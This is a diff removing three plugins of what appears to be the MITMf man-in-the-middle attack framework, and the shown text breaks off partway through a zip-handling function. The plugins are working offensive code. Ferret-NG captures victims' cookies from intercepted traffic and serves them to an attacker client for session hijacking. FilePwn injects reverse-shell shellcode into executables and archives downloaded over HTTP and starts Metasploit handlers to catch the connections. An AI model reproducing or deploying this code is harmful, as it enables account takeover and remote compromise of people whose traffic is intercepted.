@ -1,45 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class CacheKill(Plugin):
|
|
||||||
name = "CacheKill"
|
|
||||||
optname = "cachekill"
|
|
||||||
desc = "Kills page caching by modifying headers"
|
|
||||||
version = "0.1"
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
self.bad_headers = ['if-none-match', 'if-modified-since']
|
|
||||||
|
|
||||||
def serverHeaders(self, response, request):
|
|
||||||
'''Handles all response headers'''
|
|
||||||
response.headers['Expires'] = "0"
|
|
||||||
response.headers['Cache-Control'] = "no-cache"
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
'''Handles outgoing request'''
|
|
||||||
request.headers['pragma'] = 'no-cache'
|
|
||||||
for header in self.bad_headers:
|
|
||||||
if header in request.headers:
|
|
||||||
del request.headers[header]
|
|
|
@ -1,105 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
import logging
|
|
||||||
import ast
|
|
||||||
import sys
|
|
||||||
|
|
||||||
from datetime import datetime
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from twisted.internet import reactor
|
|
||||||
from twisted.web import http
|
|
||||||
from twisted.internet import reactor
|
|
||||||
from core.utils import shutdown
|
|
||||||
from core.ferretng.FerretProxy import FerretProxy
|
|
||||||
from core.ferretng.URLMonitor import URLMonitor
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class FerretNG(Plugin):
|
|
||||||
name = "Ferret-NG"
|
|
||||||
optname = "ferretng"
|
|
||||||
desc = "Captures cookies and starts a proxy that will feed them to connected clients"
|
|
||||||
version = "0.1"
|
|
||||||
has_opts = True
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
|
||||||
self.options = options
|
|
||||||
self.ferret_port = 10010 or options.ferret_port
|
|
||||||
self.cookie_file = None
|
|
||||||
|
|
||||||
URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
|
|
||||||
|
|
||||||
if options.cookie_file:
|
|
||||||
self.tree_info.append('Loading cookies from log file')
|
|
||||||
try:
|
|
||||||
with open(options.cookie_file, 'r') as cookie_file:
|
|
||||||
self.cookie_file = ast.literal_eval(cookie_file.read())
|
|
||||||
URLMonitor.getInstance().cookies = self.cookie_file
|
|
||||||
cookie_file.close()
|
|
||||||
except Exception as e:
|
|
||||||
shutdown("[-] Error loading cookie log file: {}".format(e))
|
|
||||||
|
|
||||||
self.tree_info.append("Listening on port {}".format(self.ferret_port))
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
mitmf_logger.info("[Ferret-NG] Will now hijack captured sessions from {}".format(self.config['Ferret-NG']['Client']))
|
|
||||||
URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
|
|
||||||
|
|
||||||
def clientRequest(self, request):
|
|
||||||
if 'cookie' in request.headers:
|
|
||||||
host = request.headers['host']
|
|
||||||
cookie = request.headers['cookie']
|
|
||||||
client = request.client.getClientIP()
|
|
||||||
|
|
||||||
if client not in URLMonitor.getInstance().cookies:
|
|
||||||
URLMonitor.getInstance().cookies[client] = []
|
|
||||||
|
|
||||||
for entry in URLMonitor.getInstance().cookies[client]:
|
|
||||||
if host == entry['host']:
|
|
||||||
mitmf_logger.debug("{} [Ferret-NG] Updating captured session for {}".format(client, host))
|
|
||||||
entry['host'] = host
|
|
||||||
entry['cookie'] = cookie
|
|
||||||
return
|
|
||||||
|
|
||||||
mitmf_logger.info("{} [Ferret-NG] Host: {} Captured cookie: {}".format(client, host, cookie))
|
|
||||||
URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie})
|
|
||||||
|
|
||||||
def pluginReactor(self, StrippingProxy):
|
|
||||||
FerretFactory = http.HTTPFactory(timeout=10)
|
|
||||||
FerretFactory.protocol = FerretProxy
|
|
||||||
reactor.listenTCP(self.ferret_port, FerretFactory)
|
|
||||||
|
|
||||||
def pluginOptions(self, options):
|
|
||||||
options.add_argument('--port', dest='ferret_port', metavar='PORT', type=int, default=None, help='Port to start Ferret-NG proxy on (default 10010)')
|
|
||||||
options.add_argument('--load-cookies', dest='cookie_file', metavar='FILE', type=str, default=None, help='Load cookies from a log file')
|
|
||||||
|
|
||||||
def finish(self):
|
|
||||||
if not URLMonitor.getInstance().cookies:
|
|
||||||
return
|
|
||||||
|
|
||||||
if self.cookie_file == URLMonitor.getInstance().cookies:
|
|
||||||
return
|
|
||||||
|
|
||||||
mitmf_logger.info("[Ferret-NG] Writing cookies to log file")
|
|
||||||
with open('./logs/ferret-ng/cookies-{}.log'.format(datetime.now().strftime("%Y-%m-%d_%H:%M:%S:%s")), 'w') as cookie_file:
|
|
||||||
cookie_file.write(str(URLMonitor.getInstance().cookies))
|
|
||||||
cookie_file.close()
|
|
|
@ -1,640 +0,0 @@
|
||||||
#!/usr/bin/env python2.7
|
|
||||||
|
|
||||||
# Copyright (c) 2014-2016 Marcello Salvati
|
|
||||||
#
|
|
||||||
# This program is free software; you can redistribute it and/or
|
|
||||||
# modify it under the terms of the GNU General Public License as
|
|
||||||
# published by the Free Software Foundation; either version 3 of the
|
|
||||||
# License, or (at your option) any later version.
|
|
||||||
#
|
|
||||||
# This program is distributed in the hope that it will be useful, but
|
|
||||||
# WITHOUT ANY WARRANTY; without even the implied warranty of
|
|
||||||
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
|
||||||
# General Public License for more details.
|
|
||||||
#
|
|
||||||
# You should have received a copy of the GNU General Public License
|
|
||||||
# along with this program; if not, write to the Free Software
|
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
|
||||||
# USA
|
|
||||||
#
|
|
||||||
|
|
||||||
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
|
||||||
#
|
|
||||||
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
|
||||||
#
|
|
||||||
# Copyright (c) 2013-2014, Joshua Pitts
|
|
||||||
# All rights reserved.
|
|
||||||
#
|
|
||||||
# Redistribution and use in source and binary forms, with or without modification,
|
|
||||||
# are permitted provided that the following conditions are met:
|
|
||||||
#
|
|
||||||
# 1. Redistributions of source code must retain the above copyright notice,
|
|
||||||
# this list of conditions and the following disclaimer.
|
|
||||||
#
|
|
||||||
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
|
||||||
# this list of conditions and the following disclaimer in the documentation
|
|
||||||
# and/or other materials provided with the distribution.
|
|
||||||
#
|
|
||||||
# 3. Neither the name of the copyright holder nor the names of its contributors
|
|
||||||
# may be used to endorse or promote products derived from this software without
|
|
||||||
# specific prior written permission.
|
|
||||||
#
|
|
||||||
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
|
||||||
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
||||||
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
|
||||||
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
|
||||||
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
|
||||||
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
|
||||||
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
|
||||||
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
|
||||||
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
# POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
#
|
|
||||||
# Tested on Kali-Linux.
|
|
||||||
|
|
||||||
import sys
|
|
||||||
import os
|
|
||||||
import pefile
|
|
||||||
import zipfile
|
|
||||||
import logging
|
|
||||||
import shutil
|
|
||||||
import random
|
|
||||||
import string
|
|
||||||
import threading
|
|
||||||
import tarfile
|
|
||||||
import multiprocessing
|
|
||||||
|
|
||||||
from libs.bdfactory import pebin
|
|
||||||
from libs.bdfactory import elfbin
|
|
||||||
from libs.bdfactory import machobin
|
|
||||||
from core.msfrpc import Msf
|
|
||||||
from core.utils import shutdown
|
|
||||||
from plugins.plugin import Plugin
|
|
||||||
from tempfile import mkstemp
|
|
||||||
from configobj import ConfigObj
|
|
||||||
|
|
||||||
mitmf_logger = logging.getLogger("mitmf")
|
|
||||||
|
|
||||||
class FilePwn(Plugin):
|
|
||||||
name = "FilePwn"
|
|
||||||
optname = "filepwn"
|
|
||||||
desc = "Backdoor executables being sent over http using bdfactory"
|
|
||||||
tree_info = ["BDFProxy v0.3.2 online"]
|
|
||||||
version = "0.3"
|
|
||||||
has_opts = False
|
|
||||||
|
|
||||||
def initialize(self, options):
|
|
||||||
'''Called if plugin is enabled, passed the options namespace'''
|
|
||||||
self.options = options
|
|
||||||
|
|
||||||
self.patched = multiprocessing.Queue()
|
|
||||||
|
|
||||||
#FOR FUTURE USE
|
|
||||||
self.binaryMimeTypes = ["application/octet-stream", 'application/x-msdownload', 'application/x-msdos-program', 'binary/octet-stream']
|
|
||||||
|
|
||||||
#FOR FUTURE USE
|
|
||||||
self.zipMimeTypes = ['application/x-zip-compressed', 'application/zip']
|
|
||||||
|
|
||||||
#USED NOW
|
|
||||||
self.magicNumbers = {'elf': {'number': '7f454c46'.decode('hex'), 'offset': 0},
|
|
||||||
'pe': {'number': 'MZ', 'offset': 0},
|
|
||||||
'gz': {'number': '1f8b'.decode('hex'), 'offset': 0},
|
|
||||||
'bz': {'number': 'BZ', 'offset': 0},
|
|
||||||
'zip': {'number': '504b0304'.decode('hex'), 'offset': 0},
|
|
||||||
'tar': {'number': 'ustar', 'offset': 257},
|
|
||||||
'fatfile': {'number': 'cafebabe'.decode('hex'), 'offset': 0},
|
|
||||||
'machox64': {'number': 'cffaedfe'.decode('hex'), 'offset': 0},
|
|
||||||
'machox86': {'number': 'cefaedfe'.decode('hex'), 'offset': 0},
|
|
||||||
}
|
|
||||||
|
|
||||||
#NOT USED NOW
|
|
||||||
#self.supportedBins = ('MZ', '7f454c46'.decode('hex'))
|
|
||||||
|
|
||||||
#FilePwn options
|
|
||||||
self.userConfig = self.config['FilePwn']
|
|
||||||
self.FileSizeMax = self.userConfig['targets']['ALL']['FileSizeMax']
|
|
||||||
self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
|
|
||||||
self.WindowsIntelx64 = self.userConfig['targets']['ALL']['WindowsIntelx64']
|
|
||||||
self.WindowsType = self.userConfig['targets']['ALL']['WindowsType']
|
|
||||||
self.LinuxIntelx86 = self.userConfig['targets']['ALL']['LinuxIntelx86']
|
|
||||||
self.LinuxIntelx64 = self.userConfig['targets']['ALL']['LinuxIntelx64']
|
|
||||||
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
|
|
||||||
self.MachoIntelx86 = self.userConfig['targets']['ALL']['MachoIntelx86']
|
|
||||||
self.MachoIntelx64 = self.userConfig['targets']['ALL']['MachoIntelx64']
|
|
||||||
self.FatPriority = self.userConfig['targets']['ALL']['FatPriority']
|
|
||||||
self.zipblacklist = self.userConfig['ZIP']['blacklist']
|
|
||||||
self.tarblacklist = self.userConfig['TAR']['blacklist']
|
|
||||||
|
|
||||||
msfversion = Msf().version()
|
|
||||||
self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
|
|
||||||
|
|
||||||
t = threading.Thread(name='setupMSF', target=self.setupMSF)
|
|
||||||
t.setDaemon(True)
|
|
||||||
t.start()
|
|
||||||
|
|
||||||
def setupMSF(self):
|
|
||||||
msf = Msf()
|
|
||||||
for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
|
|
||||||
cmd = "use exploit/multi/handler\n"
|
|
||||||
cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
|
|
||||||
cmd += "set LHOST {}\n".format(config["HOST"])
|
|
||||||
cmd += "set LPORT {}\n".format(config["PORT"])
|
|
||||||
cmd += "set ExitOnSession False\n"
|
|
||||||
cmd += "exploit -j\n"
|
|
||||||
|
|
||||||
pid = msf.findpid('multi/handler')
|
|
||||||
if pid:
|
|
||||||
info = msf.jobinfo(pid)
|
|
||||||
if (info['datastore']['payload'] == config["MSFPAYLOAD"]) and (info['datastore']['LPORT'] == config["PORT"]) and (info['datastore']['lhost'] != config['HOST']):
|
|
||||||
msf.killjob(pid)
|
|
||||||
msf.sendcommand(cmd)
|
|
||||||
else:
|
|
||||||
msf.sendcommand(cmd)
|
|
||||||
else:
|
|
||||||
msf.sendcommand(cmd)
|
|
||||||
|
|
||||||
def onConfigChange(self):
|
|
||||||
self.initialize(self.options)
|
|
||||||
|
|
||||||
def convert_to_Bool(self, aString):
|
|
||||||
if aString.lower() == 'true':
|
|
||||||
return True
|
|
||||||
elif aString.lower() == 'false':
|
|
||||||
return False
|
|
||||||
elif aString.lower() == 'none':
|
|
||||||
return None
|
|
||||||
|
|
||||||
def bytes_have_format(self, bytess, formatt):
|
|
||||||
number = self.magicNumbers[formatt]
|
|
||||||
if bytess[number['offset']:number['offset'] + len(number['number'])] == number['number']:
|
|
||||||
return True
|
|
||||||
return False
|
|
||||||
|
|
||||||
def binaryGrinder(self, binaryFile):
|
|
||||||
"""
|
|
||||||
Feed potential binaries into this function,
|
|
||||||
it will return the result PatchedBinary, False, or None
|
|
||||||
"""
|
|
||||||
|
|
||||||
with open(binaryFile, 'r+b') as f:
|
|
||||||
binaryTMPHandle = f.read()
|
|
||||||
|
|
||||||
binaryHeader = binaryTMPHandle[:4]
|
|
||||||
result = None
|
|
||||||
|
|
||||||
try:
|
|
||||||
if binaryHeader[:2] == 'MZ': # PE/COFF
|
|
||||||
pe = pefile.PE(data=binaryTMPHandle, fast_load=True)
|
|
||||||
magic = pe.OPTIONAL_HEADER.Magic
|
|
||||||
machineType = pe.FILE_HEADER.Machine
|
|
||||||
|
|
||||||
#update when supporting more than one arch
|
|
||||||
if (magic == int('20B', 16) and machineType == 0x8664 and
|
|
||||||
self.WindowsType.lower() in ['all', 'x64']):
|
|
||||||
add_section = False
|
|
||||||
cave_jumping = False
|
|
||||||
if self.WindowsIntelx64['PATCH_TYPE'].lower() == 'append':
|
|
||||||
add_section = True
|
|
||||||
elif self.WindowsIntelx64['PATCH_TYPE'].lower() == 'jump':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
# if automatic override
|
|
||||||
if self.WindowsIntelx64['PATCH_METHOD'].lower() == 'automatic':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.WindowsIntelx64['SHELL'],
|
|
||||||
HOST=self.WindowsIntelx64['HOST'],
|
|
||||||
PORT=int(self.WindowsIntelx64['PORT']),
|
|
||||||
ADD_SECTION=add_section,
|
|
||||||
CAVE_JUMPING=cave_jumping,
|
|
||||||
IMAGE_TYPE=self.WindowsType,
|
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx64['PATCH_DLL']),
|
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx64['ZERO_CERT']),
|
|
||||||
PATCH_METHOD=self.WindowsIntelx64['PATCH_METHOD'].lower()
|
|
||||||
)
|
|
||||||
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif (machineType == 0x14c and
|
|
||||||
self.WindowsType.lower() in ['all', 'x86']):
|
|
||||||
add_section = False
|
|
||||||
cave_jumping = False
|
|
||||||
#add_section wins for cave_jumping
|
|
||||||
#default is single for BDF
|
|
||||||
if self.WindowsIntelx86['PATCH_TYPE'].lower() == 'append':
|
|
||||||
add_section = True
|
|
||||||
elif self.WindowsIntelx86['PATCH_TYPE'].lower() == 'jump':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
# if automatic override
|
|
||||||
if self.WindowsIntelx86['PATCH_METHOD'].lower() == 'automatic':
|
|
||||||
cave_jumping = True
|
|
||||||
|
|
||||||
targetFile = pebin.pebin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.WindowsIntelx86['SHELL'],
|
|
||||||
HOST=self.WindowsIntelx86['HOST'],
|
|
||||||
PORT=int(self.WindowsIntelx86['PORT']),
|
|
||||||
ADD_SECTION=add_section,
|
|
||||||
CAVE_JUMPING=cave_jumping,
|
|
||||||
IMAGE_TYPE=self.WindowsType,
|
|
||||||
PATCH_DLL=self.convert_to_Bool(self.WindowsIntelx86['PATCH_DLL']),
|
|
||||||
SUPPLIED_SHELLCODE=self.WindowsIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
ZERO_CERT=self.convert_to_Bool(self.WindowsIntelx86['ZERO_CERT']),
|
|
||||||
PATCH_METHOD=self.WindowsIntelx86['PATCH_METHOD'].lower()
|
|
||||||
)
|
|
||||||
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') == '7f454c46': # ELF
|
|
||||||
|
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile, SUPPORT_CHECK=False)
|
|
||||||
targetFile.support_check()
|
|
||||||
|
|
||||||
if targetFile.class_type == 0x1:
|
|
||||||
#x86CPU Type
|
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.LinuxIntelx86['SHELL'],
|
|
||||||
HOST=self.LinuxIntelx86['HOST'],
|
|
||||||
PORT=int(self.LinuxIntelx86['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.LinuxIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
IMAGE_TYPE=self.LinuxType
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
elif targetFile.class_type == 0x2:
|
|
||||||
#x64
|
|
||||||
targetFile = elfbin.elfbin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.LinuxIntelx64['SHELL'],
|
|
||||||
HOST=self.LinuxIntelx64['HOST'],
|
|
||||||
PORT=int(self.LinuxIntelx64['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.LinuxIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
IMAGE_TYPE=self.LinuxType
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif binaryHeader[:4].encode('hex') in ['cefaedfe', 'cffaedfe', 'cafebabe']: # Macho
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile, SUPPORT_CHECK=False)
|
|
||||||
targetFile.support_check()
|
|
||||||
|
|
||||||
#ONE CHIP SET MUST HAVE PRIORITY in FAT FILE
|
|
||||||
|
|
||||||
if targetFile.FAT_FILE is True:
|
|
||||||
if self.FatPriority == 'x86':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif self.FatPriority == 'x64':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x7':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx86['SHELL'],
|
|
||||||
HOST=self.MachoIntelx86['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx86['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx86['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
elif targetFile.mach_hdrs[0]['CPU Type'] == '0x1000007':
|
|
||||||
targetFile = machobin.machobin(FILE=binaryFile,
|
|
||||||
OUTPUT=os.path.basename(binaryFile),
|
|
||||||
SHELL=self.MachoIntelx64['SHELL'],
|
|
||||||
HOST=self.MachoIntelx64['HOST'],
|
|
||||||
PORT=int(self.MachoIntelx64['PORT']),
|
|
||||||
SUPPLIED_SHELLCODE=self.MachoIntelx64['SUPPLIED_SHELLCODE'],
|
|
||||||
FAT_PRIORITY=self.FatPriority
|
|
||||||
)
|
|
||||||
result = targetFile.run_this()
|
|
||||||
|
|
||||||
self.patched.put(result)
|
|
||||||
return
|
|
||||||
|
|
||||||
except Exception as e:
|
|
||||||
print 'Exception', str(e)
|
|
||||||
mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
|
|
||||||
return None
|
|
||||||
|
|
||||||
def tar_files(self, aTarFileBytes, formatt):
|
|
||||||
"When called will unpack and edit a Tar File and return a tar file"
|
|
||||||
|
|
||||||
print "[*] TarFile size:", len(aTarFileBytes) / 1024, 'KB'
|
|
||||||
|
|
||||||
if len(aTarFileBytes) > int(self.userConfig['TAR']['maxSize']):
|
|
||||||
print "[!] TarFile over allowed size"
|
|
||||||
mitmf_logger.info("TarFIle maxSize met {}".format(len(aTarFileBytes)))
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
with tempfile.NamedTemporaryFile() as tarFileStorage:
|
|
||||||
tarFileStorage.write(aTarFileBytes)
|
|
||||||
tarFileStorage.flush()
|
|
||||||
|
|
||||||
if not tarfile.is_tarfile(tarFileStorage.name):
|
|
||||||
print '[!] Not a tar file'
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
compressionMode = ':'
|
|
||||||
if formatt == 'gz':
|
|
||||||
compressionMode = ':gz'
|
|
||||||
if formatt == 'bz':
|
|
||||||
compressionMode = ':bz2'
|
|
||||||
|
|
||||||
tarFile = None
|
|
||||||
try:
|
|
||||||
tarFileStorage.seek(0)
|
|
||||||
tarFile = tarfile.open(fileobj=tarFileStorage, mode='r' + compressionMode)
|
|
||||||
except tarfile.ReadError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
if tarFile is None:
|
|
||||||
print '[!] Not a tar file'
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
|
|
||||||
print '[*] Tar file contents and info:'
|
|
||||||
print '[*] Compression:', formatt
|
|
||||||
|
|
||||||
members = tarFile.getmembers()
|
|
||||||
for info in members:
|
|
||||||
print "\t", info.name, info.mtime, info.size
|
|
||||||
|
|
||||||
newTarFileStorage = tempfile.NamedTemporaryFile()
|
|
||||||
newTarFile = tarfile.open(mode='w' + compressionMode, fileobj=newTarFileStorage)
|
|
||||||
|
|
||||||
patchCount = 0
|
|
||||||
wasPatched = False
|
|
||||||
|
|
||||||
for info in members:
|
|
||||||
print "[*] >>> Next file in tarfile:", info.name
|
|
||||||
|
|
||||||
if not info.isfile():
|
|
||||||
print info.name, 'is not a file'
|
|
||||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
|
||||||
continue
|
|
||||||
|
|
||||||
if info.size >= long(self.FileSizeMax):
|
|
||||||
print info.name, 'is too big'
|
|
||||||
newTarFile.addfile(info, tarFile.extractfile(info))
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Check against keywords
|
|
||||||
keywordCheck = False
|
|
||||||
|
|
||||||
if type(self.tarblacklist) is str:
|
|
||||||
if self.tarblacklist.lower() in info.name.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
|
|
||||||
else:
|
|
||||||
for keyword in self.tarblacklist:
|
|
||||||
if keyword.lower() in info.name.lower():
|
|
||||||
keywordCheck = True
|
|
||||||
continue
|
|
||||||
|
|
||||||
if keywordCheck is True:
|
|
||||||
print "[!] Tar blacklist enforced!"
|
|
||||||
mitmf_logger.info('Tar blacklist enforced on {}'.format(info.name))
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Try to patch
|
|
||||||
extractedFile = tarFile.extractfile(info)
|
|
||||||
|
|
||||||
if patchCount >= int(self.userConfig['TAR']['patchCount']):
|
|
||||||
newTarFile.addfile(info, extractedFile)
|
|
||||||
else:
|
|
||||||
# create the file on disk temporarily for fileGrinder to run on it
|
|
||||||
with tempfile.NamedTemporaryFile() as tmp:
|
|
||||||
shutil.copyfileobj(extractedFile, tmp)
|
|
||||||
tmp.flush()
|
|
||||||
patchResult = self.binaryGrinder(tmp.name)
|
|
||||||
if patchResult:
|
|
||||||
patchCount += 1
|
|
||||||
file2 = "backdoored/" + os.path.basename(tmp.name)
|
|
||||||
print "[*] Patching complete, adding to tar file."
|
|
||||||
info.size = os.stat(file2).st_size
|
|
||||||
with open(file2, 'rb') as f:
|
|
||||||
newTarFile.addfile(info, f)
|
|
||||||
mitmf_logger.info("{} in tar patched, adding to tarfile".format(info.name))
|
|
||||||
os.remove(file2)
|
|
||||||
wasPatched = True
|
|
||||||
else:
|
|
||||||
print "[!] Patching failed"
|
|
||||||
with open(tmp.name, 'rb') as f:
|
|
||||||
newTarFile.addfile(info, f)
|
|
||||||
mitmf_logger.info("{} patching failed. Keeping original file in tar.".format(info.name))
|
|
||||||
if patchCount == int(self.userConfig['TAR']['patchCount']):
|
|
||||||
mitmf_logger.info("Met Tar config patchCount limit.")
|
|
||||||
|
|
||||||
# finalize the writing of the tar file first
|
|
||||||
newTarFile.close()
|
|
||||||
|
|
||||||
# then read the new tar file into memory
|
|
||||||
newTarFileStorage.seek(0)
|
|
||||||
ret = newTarFileStorage.read()
|
|
||||||
newTarFileStorage.close() # it's automatically deleted
|
|
||||||
|
|
||||||
if wasPatched is False:
|
|
||||||
# If nothing was changed return the original
|
|
||||||
print "[*] No files were patched forwarding original file"
|
|
||||||
self.patched.put(aTarFileBytes)
|
|
||||||
return
|
|
||||||
else:
|
|
||||||
self.patched.put(ret)
|
|
||||||
return
|
|
||||||
|
|
||||||
def zip_files(self, aZipFile):
|
|
||||||
"When called will unpack and edit a Zip File and return a zip file"
|
|
||||||
|
|
||||||
print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
|
|
||||||
|
|
||||||
if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
|
|
||||||
print "[!] ZipFile over allowed size"
|
|
||||||
mitmf_logger.info("ZipFIle maxSize met {}".format(len(aZipFile)))
|
|
||||||
self.patched.put(aZipFile)
|
|
||||||
return
|
|
||||||
|
|
||||||
tmpRan = ''.join(random.choice(string.ascii_lowercase + string.digits + string.ascii_uppercase) for _ in range(8))
|
|
||||||
